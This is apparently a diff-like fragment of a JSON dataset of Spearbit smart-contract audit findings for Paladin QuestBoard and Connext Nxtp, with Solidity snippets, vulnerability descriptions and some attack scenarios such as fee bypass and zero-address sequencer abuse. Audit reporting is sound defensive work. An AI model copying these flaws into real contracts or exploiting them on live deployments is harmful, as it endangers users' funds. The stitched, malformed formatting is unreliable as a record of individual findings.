QuestBoard.sol only allows the retrieval of non whitelisted tokens. Recently an issue has been found to circumvent these checks, with so called dual entry point tokens. See a description here: compound-tusd-integration-issue-retrospective function recoverERC20(address token, uint256 amount) external onlyOwner returns(bool) { require(!whitelistedTokens[token], \"QuestBoard: Cannot recover whitelisted token\"); IERC20(token).safeTransfer(owner(), amount); return true; } 13", + "title": "_executeCalldata() can revert if insufficient gas is supplied", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _executeCalldata() contains the statement gasleft() - 10_000. This statement can revert if the available gas is less than 10_000. Perhaps this is the expected behaviour. Note: From the Tangerine Whistle fork only a maximum of 63/64 of the available gas is sent to the contract being called. Therefore, 1/64th is left for the calling contract. function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(_params.to, gasleft() - 10_000, ... ); ... }
The values of duration and minObjective are least 1, but minRewardPerVotePerToken[] could be 0 and even if minRewardPerVotePerToken is non zero but still low, the number of tokes required is neglectable when using tokens with 18 decimals. Requiring a minimum amount of tokens also helps to prevent the creation of spam quests. 14 function getQuestIdsForPeriod(uint256 period) external view returns(uint256[] memory) { return questsByPeriod[period]; // could run out of gas } function createQuest(...) { ... require(duration > 0, \"QuestBoard: Incorrect duration\"); require(objective >= minObjective, \"QuestBoard: Objective too low\"); ... require(rewardPerVote >= minRewardPerVotePerToken[rewardToken], \"QuestBoard: RewardPerVote too low\"); ... vars.rewardPerPeriod = (objective * rewardPerVote) / UNIT; // can be 0 ==> totalRewardAmount can be 0 require((totalRewardAmount * platformFee)/MAX_BPS == feeAmount, \"QuestBoard: feeAmount incorrect\"); // feeAmount can be 0 ... require((vars.rewardPerPeriod * duration) == totalRewardAmount, \"QuestBoard: totalRewardAmount incorrect\"); ... IERC20(rewardToken).safeTransferFrom(vars.creator, address(this), totalRewardAmount); IERC20(rewardToken).safeTransferFrom(vars.creator, questChest, feeAmount); ... ,! ,! ,! ,! } constructor(address _gaugeController, address _chest){ ... minObjective = 1000 * UNIT; // initial value, but can be overwritten ... } function updateMinObjective(uint256 newMinObjective) external onlyOwner { require(newMinObjective > 0, \"QuestBoard: Null value\"); // perhaps set higher minObjective = newMinObjective; } function whitelistToken(address newToken, uint256 minRewardPerVote) public onlyAllowed { // geen isAlive??? ... minRewardPerVotePerToken[newToken] = minRewardPerVote; // no minimum value required ... ,! }", + "title": "Be aware of precompiles", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The external calls by _executeCalldata() could call a precompile. Different chains have creative precompile implementations, so this could in theory pose problems. For example precompile 4 copies memory: what-s-the-identity-0x4-precompile Note: precompiles link to dedicated pieces of code written in Rust or Go that can be called from the EVM. Here are a few links for documentation on different chains: moonbeam precompiles, astar precompiles function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _params.to, ...); } else { returnData = IXReceiver(_params.to).xReceive(...); } ... }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Non existing states are considered active", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "periods- if a state is checked of a non existing However, ByQuest[questIDs[i]][period] is active. questIDs[i] or a questID that has no quest in that period, then periodsByQuest[questIDs[i]][period] is empty and periodsByQuest[questIDs[i]][period].currentState == 0. closePartOfQuestPeriod() function verifies state the of if As PeriodState.ACTIVE ==0, the stated is considered to be active and the require() doesnt trigger and pro- cessing continues. Luckily as all other values are also 0 (especially _questPeriod.rewardAmountPerPeriod), toDistributeAmount will be 0 and no tokens are sent. However slight future changes in the code might introduce unwanted effects. 
enum PeriodState { ACTIVE, CLOSED, DISTRIBUTED } // ACTIVE == 0 function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive ,! onlyAllowed nonReentrant { ... for(uint256 i = 0; i < length;){ ... require( periodsByQuest[questIDs[i]][period].currentState == PeriodState.ACTIVE, // doesn't work ,! if questIDs[i] & period are empty \"QuestBoard: Period already closed\" );", + "title": "Upgrade to solidity 0.8.17", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Solidity 0.8.17 released a bugfix where the optimizer could incorrectly remove storage writes if the code fit a certain pattern (see this security alert). This bug was introduced in 0.8.13. Since Connext is using the legacy code generation pipeline, i.e., compiling without the via-IR flag, the current code is not at risk. This is because assembly blocks don't write to storage. However, if this changes and Connext compiles through via-IR code generation, the code is more likely to be affected. One reason to use this code generation pipeline could be to enable gas optimizations not available in legacy code generation.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Critical changes should use two-step process", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The QuestBoard.sol, QuestTreasureChest.sol and QuestTreasureChest.sol contracts inherit from OpenZeppelins Ownable contract which enables the onlyOwner role to transfer ownership to another address. Its possible that the onlyOwner role mistakenly transfers ownership to the wrong address, resulting in a loss of the onlyOwner role. This is an unwanted situation because the owner role is neccesary for several methods.", + "title": "Add domain check in setupAssetWithDeployedRepresentation()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function setupAssetWithDeployedRepresentation() links a new _representation asset. However, this should not be done on the canonical domain, so it is good to check for this to prevent potential mistakes. function setupAssetWithDeployedRepresentation(...) ... { bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _representation, _stableSwapPool, _canonical); ... }", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Prevent accidental call of emergencyUpdatequestPeriod()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Functions updateQuestPeriod() and emergencyUpdatequestPeriod() are very similar. However, if function emergencyUpdatequestPeriod() is accidentally used instead of updateQuestPeriod(), then period isnt push()ed to the array questClosedPeriods[]. This means function getClosedPeriodsByQuests() will not be able to retreive all the closed periods. function updateQuestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyAllowed returns(bool) { ... questClosedPeriods[questID].push(period); ... questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! } function emergencyUpdatequestPeriod(uint256 questID, uint256 period, bytes32 merkleRoot) external onlyOwner returns(bool) { ... // no push() questMerkleRootPerPeriod[questID][period] = merkleRoot; ... ,! 
}", + "title": "If an adopted token and its canonical live on the same domain the cap for the custodied amount is applied for each of those tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If _local is an adopted asset that lives on its canonical's original chain, then we are comparing the to-be-updated balance of this contract (custodied) with s.caps[key]. That means we are also comparing the balance of an adopted asset with the property above with the cap. For example, if A is the canonical token and B the adopted, then cap = s.caps[key] is used to cap the custodied amount in this contract for both of those tokens. So if the cap is 1000, the contract can have a balance of 1000 A and 1000 B, which is twice the amount meant to be capped. This is true basically for any approved asset with the above properties. When the owner or the admin calls setu- pAsset: // File: https://github.com/connext/nxtp/blob/32a0370edc917cc45c231565591740ff274b5c05/packages/deploym ents/contracts/contracts/core/connext/facets/TokenFacet.sol#L164-L172 ,! function setupAsset( c TokenId calldata _canonical, uint8 _canonicalDecimals, string memory _representationName, string memory _representationSymbol, address _adoptedAssetId, address _stableSwapPool, uint256 _cap ) external onlyOwnerOrAdmin returns (address _local) { such that _canonical.domain == s.domain and _adoptedAssetId != 0, then this asset has the property in ques- tion.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Usage of deprecated safeApprove", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "OpenZeppelin safeApprove implementation is deprecated. Reference. Using this deprecated func- tion can lead to unintended reverts and potential locking of funds. SafeERC20.safeApprove() Insecure Behaviour.", + "title": "There are no checks/constraints against the _representation provided to setupAssetWithDe- ployedRepresentation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "setupAssetWithDeployedRepresentation is similar to setupAsset in terms of functionality, except it does not deploy a representation token if necessary. It actually uses the _representation address given as the representation token. The _representation parameter given does not have any checks in terms of functionality compared to when setupAsset which deploys a new BridgeToken instance: // File: packages\\deployments\\contracts\\contracts\\core\\connext\\facets\\TokenFacet.sol#L399 _token = address(new BridgeToken(_decimals, _name, _symbol)); Basically, representation needs to implement IBridgeToken (mint, burn, setDetails, ... ) and some sort of IERC20. Otherwise, if a function from IBridgeToken is not implemented or if it does not have IERC20 functionality, it can cause failure/reverts in some functions in this codebase. Another thing that is important is that the decimals for _representation should be equal to the decimals precision of the canonical token. And that _representation should not be able to update/change its decimals. Also, this opens an opportunity for a bad owner or admin to provide a malicious _representation to this function. This does not have to be a malicious act, it can also happen by mistake from for example an admin. 
Additionally, the Connext Diamond must have the \"right\" to mint() and burn() the tokens.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "questID on the NewQuest event should be indexed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The NewQuest event currently does not have questID set to indexed which goes against the pattern set by the other events in the contract where questID is actually indexed.", + "title": "In dequeueVerified when no verified items are found in the queue last == first - 1", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The comment in dequeueVerified mentions that when no verified items are found in the queue, then last == first. But this is not true since the loop condition is last >= first and the loop only terminates (not considering the break) when last == first - 1. It is important to correct this incorrect statement in the comment, since a dev/user can by mistake take this statement as true and modify/use the code with this incorrect assumption in mind.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Add validation checks on addresses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Missing validation checks on addresses passed into the constructor functions. Adding these checks on _gaugeController and _chest can prevent costly errors the during deployment of the contract. Also in function claim() and claimQuest() there is no zero check for for account argument.", + "title": "Dirty bytes in _loc and _len can override other values when packing a typed memory view in unsafeBuildUnchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For a TypedMemView, the location and the length are supposed to occupy 12 bytes (uint96), but the type used for these input parameters of unsafeBuildUnchecked is uint256. This would allow those values to carry dirty bytes, and when the following calculations are performed: newView := shl(96, or(newView, _type)) // insert type newView := shl(96, or(newView, _loc)) // insert loc newView := shl(24, or(newView, _len)) // empty bottom 3 bytes _loc can potentially manipulate the type section of the view and _len can potentially manipulate both the _loc and the _type section.", "labels": [ "Spearbit", - "Paladin", + "ConnextNxtp", "Severity: Low Risk" ] }, { - "title": "Changing public constant variables to non-public can save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Several constants are public and thus have a getter function. called from the outside, therefore it is not necessary to make them public. It is unlikely for these values to be", + "title": "To use sha2, hash160 and hash256 of TypedMemView the hard-coded precompile addresses would need to be checked to make sure they return the corresponding hash values.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "sha2, hash160 and hash256 assume that the precompile contracts at address(2) and address(3) calculate and return the sha256 and ripemd160 hashes of the provided memory chunks. 
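For illustration, the assumption being relied on looks roughly like the following (our own minimal sketch of calling the hard-coded precompile address, not the library's implementation):

pragma solidity ^0.8.17;

library PrecompileSha2 {
    // address(2) is assumed to host the sha256 precompile; on a chain where
    // that address hosts nothing (or something else), this check would catch it.
    function sha2(bytes memory _data) internal view returns (bytes32 digest) {
        (bool ok, bytes memory out) = address(2).staticcall(_data);
        require(ok && out.length == 32, \"sha256 precompile unavailable\");
        digest = abi.decode(out, (bytes32));
    }
}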
These assumptions depend on the chain that the project is going to be deployed on.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Using uint instead of bool to optimize gas usage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "A bool is more costly than uint256. Because each write action generates an additional SLOAD to read the contents of the slot, change the bits occupied by bool and finally write back. contract BooleanTest { mapping(address => bool) approvedManagers; // Gas Cost : 44144 function approveManager(address newManager) external{ approvedManagers[newManager] = true; } mapping(address => uint256) approvedManagersWithoutBoolean; // Gas Cost : 44069 function approveManagerWithoutBoolean(address newManager) external{ approvedManagersWithoutBoolean[newManager] = 1; } }", + "title": "sha2, hash160 and hash256 of TypedMemView.sha2 do not clear the memory after calculating the hash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "When a call to the precompile contract at address(2) (or at address(3)) is made, the returned value is placed at the slot pointed to by the free memory pointer and then placed on the stack. The free memory pointer is neither incremented to account for this used memory position, nor does the code clean this 32-byte memory slot. Therefore, after a call to sha2, hash160 or hash256, we would end up with dirty bytes.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Optimize && operator usage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The check && consumes more gas than using multiple require statements. Example test can be seen below: //Gas Cost: 22515 function increaseQuestReward(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 feeAmount) ,! public { require(newRewardPerVote != 0 && addedRewardAmount != 0 && feeAmount != 0, \"QuestBoard: Null ,! amount\"); } //Gas Cost: 22477 function increaseQuestRewardTest(uint256 newRewardPerVote, uint256 addedRewardAmount, uint256 ,! feeAmount) public { require(newRewardPerVote != 0, \"QuestBoard: Null amount\"); require(addedRewardAmount != 0, \"QuestBoard: Null amount\"); require(feeAmount != 0, \"QuestBoard: Null amount\"); } Note : It costs more gas to deploy but it is worth it after X calls. Trade-offs should be considered.", + "title": "Fee on transfer token support", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "It seems that only the addLiquidity function currently supports fee-on-transfer tokens. All other operations, like swapping, prohibit fee-on-transfer tokens. Note: The SwapUtilsExternal.sol contract allows fee-on-transfer tokens and, as per the product team, this is expected for this token", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Unnecesary value set to 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Since all default values in solidity are already 0 it riod.rewardAmountDistributed = 0; here as it should already be 0. 
is unnecessary to include _questPe-", + "title": "Fee on transfer tokens can stuck the transaction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Consider the following scenario. 1. Assume User has made an xcall with amount A of token X with calldata C1. Since there was no fee while transferring funds, the transfer was a success. 2. Now, before this amount can be transferred on the destination domain, token X introduced a fee on transfer. 3. Relayer now executes this transaction on the destination domain via the _handleExecuteTransaction function on BridgeFacet.sol#L756. 4. This transfers the amount A of token X to the destination domain, but since the fee on this token has now been introduced, the destination domain receives amount A-delta. 5. This calldata is called on the destination domain but the amount passed is A instead of A-delta, so if the IXReceiver has an amount check, it will fail because it expects amount A when it really got A-delta.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Optimize unsigned integer comparison", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Check != 0 costs less gas compared to > 0 for unsigned integers in require statements with the optimizer enabled. While it may seem that > 0 is cheaper than !=0 this is only true without the optimizer being enabled and outside a require statement. If the optimizer is enabled at 10k and it is in a require statement, it would be more gas efficient.", + "title": "Initial Liquidity Provider can trick the system", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Since there is no cap on the amount the initial depositor can deposit, an attacker can trick the system into bypassing admin fees for other users by selling liquidity at half admin fees. Consider the following scenario. 1. User A provides the first liquidity of a huge amount. 2. Since there aren't any fees from initial liquidity, admin fees are not collected from User A. 3. Now User A can sell his liquidity to other users with half admin fees. 4. Other users can mint larger liquidity due to lesser fees and User A also gets the benefit of adminFees/2.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Use memory instead of storage in closeQuestPeriod() and closePartOfQuestPeriod()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "In functions closeQuestPeriod() and closePartOfQuestPeriod() a storage pointer _quest is set to quests[questsForPeriod[i]]. This is normally used when write access to the location is need. Nevertheless _quest is read only, to a copy of quests[questsForPeriod[i]] is also sufficient. This can save some gas. function closeQuestPeriod(uint256 period) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questsForPeriod[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! 
} function closePartOfQuestPeriod(uint256 period, uint256[] calldata questIDs) external isAlive onlyAllowed nonReentrant { ... Quest storage _quest = quests[questIDs[i]]; ... gaugeController.checkpoint_gauge(_quest.gauge); // read only access of _quest ... uint256 periodBias = gaugeController.points_weight(_quest.gauge, nextPeriod).bias; // read only access of _quest ... IERC20(_quest.rewardToken).safeTransfer(distributor, toDistributeAmount); // read only access of _quest ... ,! ,! ,! }", + "title": "Ensure non-zero local asset in _xcall()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The local asset fetched in _xcall() is not verified to be a non-zero address. In case token mappings are not updated correctly, and to future-proof against later changes, it's better to revert if a zero-address local asset is fetched. local = _getLocalAsset(key, canonical.id, canonical.domain);", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Revert string size optimization", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Shortening revert strings to fit in 32 bytes will decrease deploy time gas and will decrease runtime gas when the revert condition has been met. Revert strings using more than 32 bytes require at least one additional mstore, along with additional operations for computing memory offset.", + "title": "Use ExcessivelySafeCall to call xReceive()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For reconciled transfers, ExcessivelySafeCall is used to call xReceive(). This is done to avoid copying a large amount of return data in memory. This same attack vector exists for non-reconciled transfers; however, in this case a usual function call is made for xReceive(). However, in case non-reconciled calls fail due to this error, they can always be retried after reconciliation.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Optimize withdrawUnusedRewards() and emergencyWithdraw() with pointers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "ByQuest[questID][_questPeriods[i]] several times. pointer to read and update values. This will save gas and also make the code more readable. periods- It is possible to set a pointer to this record and use that withdrawUnusedRewards() emergencyWithdraw() Functions and use function withdrawUnusedRewards(uint256 questID, address recipient) external isAlive nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState == PeriodState.ACTIVE) { ... } ... uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } ... } function emergencyWithdraw(uint256 questID, address recipient) external nonReentrant { ... if(periodsByQuest[questID][_questPeriods[i]].currentState != PeriodState.ACTIVE){ uint256 withdrawableForPeriod = periodsByQuest[questID][_questPeriods[i]].withdrawableAmount; ... if(withdrawableForPeriod > 0){ ... periodsByQuest[questID][_questPeriods[i]].withdrawableAmount = 0; } } else { .. 
totalWithdraw += periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod; periodsByQuest[questID][_questPeriods[i]].rewardAmountPerPeriod = 0; } ... }", + "title": "A router's liquidity might get trapped if the router is removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "If the owner or a user with the Role.Router role removes a router that does not implement calling removeRouterLiquidity or removeRouterLiquidityFor, then any liquidity remaining in the contract for the removed router cannot be transferred back to the router.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Needless to initialize variables with default values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "uint256 variables are initialized to a default value of 0 per Solidity docs. Setting a variable to the default value is unnecessary.", + "title": "In-flight transfers by the relayer can be reverted when setMaxRoutersPerTransfer is called beforehand with a lower number", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For in-flight transfers where an approved sequencer has picked and signed an x number of routers for a transfer, from the time a relayer or another 3rd party grabs this ExecuteArgs _args to the time this party submits it to the destination domain by calling execute on a connext instance, the owner or an admin can call setMaxRoutersPerTransfer with a number lower than x, on purpose or not. This would cause the call to execute to revert with BridgeFacet__execute_maxRoutersExceeded.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Optimize the calculation of the currentPeriod", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The retrieval of currentPeriod is relatively gas expensive because it requires an SLOAD instruction (100 gas) every time. Calculating (block.timestamp / WEEK) * WEEK; is cheaper (TIMESTAMP: 2 gas, MUL: 5 gas, DIV: 5 gas). Refer to evm.codes for more information. Additionally, there is a risk that the call to updatePeriod() is forgotten although it does not happen in the current code. function updatePeriod() public { if (block.timestamp >= currentPeriod + WEEK) { currentPeriod = (block.timestamp / WEEK) * WEEK; } } Note: it is also possible to do all calculations with (block.timestamp / WEEK) instead of (block.timestamp / WEEK) * WEEK, but as the Paladin project has indicated:\"\" This currentPeriod is a timestamp, showing the start date of the current period, and based from the Curve system (because we want the same timestamp they have in the GaugeController).\"", + "title": "All the privileged users that can call withdrawSwapAdminFees would need to trust each other", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The owner needs to trust all the admins and also all admins need to trust each other. 
This is because any admin can call the withdrawSwapAdminFees endpoint to withdraw all of a pool's admin fees into their own account.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Change memory to calldata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "For the function parameters, it is often more optimal to have the reference location to be calldata instead of memory. Changing bytes to calldata will decrease gas usage. OpenZeppelin Pull Request", + "title": "The supplied _a to initializeSwap cannot be directly updated but only ramped", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter), the supplied _a (the scaled amplification coefficient, A * n^(n - 1)) to initializeSwap cannot be directly updated but only ramped. The owner or the admin can still call rampA to update _a, but it will take some time for it to reach the desired value. This is mostly important if by mistake an incorrect value for _a is provided to initializeSwap.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Caching array length at the beginning of function can save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "Caching array length at the beginning of the function can save gas in the several locations. function multiClaim(address account, ClaimParams[] calldata claims) external { require(claims.length != 0, \"MultiMerkle: empty parameters\"); uint256 length = claims.length; // if this is done before the require, the require can use \"length\" ... }", + "title": "Inconsistent behavior when xcall with a non-existent _params.to", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "An xcall with a non-existent _params.to behaves differently depending on the path taken. 1. Fast Liquidity Path - Use IXReceiver(_params.to).xReceive. The _executeCalldata function will revert if _params.to is non-existent, which technically means that the execution has failed. 2. Slow Path - Use ExcessivelySafeCall.excessivelySafeCall. This function uses the low-level call, which will not revert and will return true if the _params.to is non-existent. The _executeCalldata function will return with success set to True, which means the execution has succeeded.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Check amount is greater than 0 to avoid calling safeTransfer() unnecessarily", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "A check should be added to make sure amount is greater than 0 to avoid calling safeTransfer() unnecessarily.", + "title": "The lpToken cloned in initializeSwap cannot be updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a swap is initialized by the owner or an admin (indexed by the key parameter), an LPToken lpToken is created by cloning the lpTokenTargetAddress provided to the initializeSwap endpoint. 
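For context, the cloning pattern described looks roughly like the following (a sketch assuming OpenZeppelin's Clones library / EIP-1167 minimal proxies, not the project's exact code):

pragma solidity ^0.8.17;

import {Clones} from \"@openzeppelin/contracts/proxy/Clones.sol\";

contract SwapInitSketch {
    // The clone forwards every call to lpTokenTargetAddress, so whatever
    // logic (or vulnerability) the target has is fixed in permanently.
    function _cloneLpToken(address lpTokenTargetAddress) internal returns (address lpToken) {
        lpToken = Clones.clone(lpTokenTargetAddress);
    }
}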
There is no restriction on lpTokenTargetAddress except that it needs to be LPToken-like; it can be malicious under the hood or have security vulnerabilities, so it cannot be trusted.", "labels": [ "Spearbit", - "Paladin", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Low Risk" ] }, { - "title": "Unchecked{++i} is more efficient than i++", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Paladin-Spearbit-Security-Review.pdf", - "body": "The function getAllQuestPeriodsForQuestId uses i++ which costs more gas than ++i, especially in a loop. Also, the createQuest function uses nextID += 1 which costs more gas than ++nextID. Finally the initialization of i = 0 can be skipped, as 0 is the default value.", + "title": "Lack of zero check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Consider the following scenarios. Instance 1 - BridgeFacet.addSequencer The addSequencer function of BridgeFacet.sol does not check that the sequencer address is not zero before adding it. function addSequencer(address _sequencer) external onlyOwnerOrAdmin { if (s.approvedSequencers[_sequencer]) revert BridgeFacet__addSequencer_alreadyApproved(); s.approvedSequencers[_sequencer] = true; emit SequencerAdded(_sequencer, msg.sender); } If a mistake during initialization or an upgrade sets s.approvedSequencers[0] = true, anyone might be able to craft a payload to execute on the bridge because the attacker can bypass the following validation within the execute function. if (!s.approvedSequencers[_args.sequencer]) { revert BridgeFacet__execute_notSupportedSequencer(); } Instance 2 - BridgeFacet.enrollRemoteRouter The enrollRemoteRouter function of BridgeFacet.sol does not check that the domain or router address is not zero before adding them. function enrollRemoteRouter(uint32 _domain, bytes32 _router) external onlyOwnerOrAdmin { // Make sure we aren't setting the current domain as the connextion. if (_domain == s.domain) { revert BridgeFacet__addRemote_invalidDomain(); } s.remotes[_domain] = _router; emit RemoteAdded(_domain, TypeCasts.bytes32ToAddress(_router), msg.sender); } Instance 3 - TokenFacet._enrollAdoptedAndLocalAssets The _enrollAdoptedAndLocalAssets function of TokenFacet.sol does not check that the _canonical.domain and _canonical.id are not zero before adding them. function _enrollAdoptedAndLocalAssets( address _adopted, address _local, address _stableSwapPool, TokenId calldata _canonical ) internal returns (bytes32 _key) { // Get the key _key = AssetLogic.calculateCanonicalHash(_canonical.id, _canonical.domain); // Get true adopted address adopted = _adopted == address(0) ? _local : _adopted; // Sanity check: needs approval if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); // Update approved assets mapping s.approvedAssets[_key] = true; // Update the adopted mapping using convention of local == adopted iff (_adooted == address(0)) s.adoptedToCanonical[adopted].domain = _canonical.domain; s.adoptedToCanonical[adopted].id = _canonical.id; These two values are used for generating the key to determine if a particular asset has been approved. Additionally, a zero value is treated as null within the AssetLogic.getCanonicalTokenId function: // Check to see if candidate is an adopted asset. _canonical = s.adoptedToCanonical[_candidate]; if (_canonical.domain != 0) { // Candidate is an adopted asset, return canonical info.
